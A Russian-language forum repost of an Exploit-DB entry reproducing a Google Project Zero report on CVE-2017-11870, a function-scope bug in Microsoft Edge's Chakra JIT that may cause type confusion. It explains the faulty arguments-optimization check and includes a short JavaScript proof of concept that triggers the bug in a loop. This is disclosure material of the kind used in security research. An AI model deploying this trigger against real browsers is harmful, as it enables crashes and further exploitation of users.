Exploit Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
43182
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2017-11870
Дата публикации
2017-11-27
Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope
Код:
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367

In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code.

function f(x) {
    print(x);

    {
        function x() {

        }
    }

    print(x);
}

The following code in "PreVisitFunction" is used to decide how to optimize arguments.
    bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());

"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.

function f(x) {
    x = 1;
}


PoC:
*/

function f(x) {
    arguments;

    {
        function x() {
        }
    }
}

for (let i = 0; i < 10000; i++)
    f();
 
Источник
www.exploit-db.com

Похожие темы